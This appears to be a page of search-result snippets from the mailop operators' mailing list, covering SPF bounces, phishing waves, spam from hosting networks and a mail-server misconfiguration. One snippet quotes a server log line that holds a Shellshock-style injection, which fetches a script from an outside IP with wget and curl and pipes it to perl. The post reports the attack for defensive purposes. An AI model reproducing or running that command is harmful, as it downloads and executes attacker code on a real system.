Am 15. Februar 2024 um 19:21:09, Eric J Esslinger via mailop
(mailop@mailop.org) schrieb:
My SPF records have been valid for... oh 10 years or so, and haven't changed,
but the last two days I'm getting intermittent bounces sending to gmail.com
addresses from our customer domain.
I've sent a
I can provide information too. Most of the mails were recognized as Junk/Spam
for me.
Am 30. Mai 2023 um 07:40:35, Hans-Martin Mosner via mailop (mailop@mailop.org)
schrieb:
There's been an ongoing phishing wave originating from nifty.com. I (and most
likely others) have sent abuse reports,
Found also one in logs:
warning: Illegal address syntax from
newcloud.thevinylspectrum.com[104.200.146.132] in MAIL command: <() { :; };
wget -qO - 136.243.150.82/qmx|perl;curl -sS 136.243.150.82/qmx|perl>
What is special about it, that it is only identified by one security vendor:
Am 27. April 2022 um 14:04:02, wilson via mailop (mailop@mailop.org) schrieb:
I expect to get lots of spam messages from the realworld to train the
bayes. do you know how to get bulk spam messages easily?
Thanks
___
mailop mailing list
Am 6. März 2022 um 13:25:42, Hans-Martin Mosner via mailop (mailop@mailop.org)
schrieb:
Am 06.03.22 um 12:55 schrieb Konstantin Filtschew / Qameta via mailop:
Hello,
I see a lot of spam comming to our systems from this Linode Networks since
24.02.2022:
- 45.79.0.0/16
- 172.104.0.0/15
Hello,
I see a lot of spam comming to our systems from this Linode Networks since
24.02.2022:
- 45.79.0.0/16
- 172.104.0.0/15
- 45.79.0.0/16
- 192.46.224.0/21
They are all associated with this domain: wewe.global
So the problems with Linode customers sending emails to other networks are
Hello folks,
I'ver tried to reach someone from Telefonica Germany (O2, E-Plus or Mediaways)
due to a typo in server setup.
IP: 212.23.125.184
PTR: mail1.o2service.de
HELO from server: mail1.o2serive.de
Should be: mail1.o2service.de
This one is at least one month old and got no reply from
I can confirm this too. Most of the attack were very specialized attacks on
German bank customers (Sparkasse, Volksbank) and they were well targeted. Most
for the ip addresses were used only once with successful delivery passing
rpsamd too.
I list some addresses:
108.166.43.95
108.166.43.90
They are not using postmark.
Received mails from paddle from this addresses:
2021-06-29 mta214a-ord.mtasv.net [104.245.209.214]
2021-06-29 mta216a-ord.mtasv.net [104.245.209.216]
2020-11-25 mta200a-ord.mtasv.net [104.245.209.200]
Hope it'll help
--
Konstantin
There is a lot of guessing in this discussion. Maybe have a look at your logs
for OVH networks and you will see something like "distributed spam delivery
system" every day. I show an example of another OVH network, which is currently
spamming German users:
This data is for one of my smaller
10 matches
Mail list logo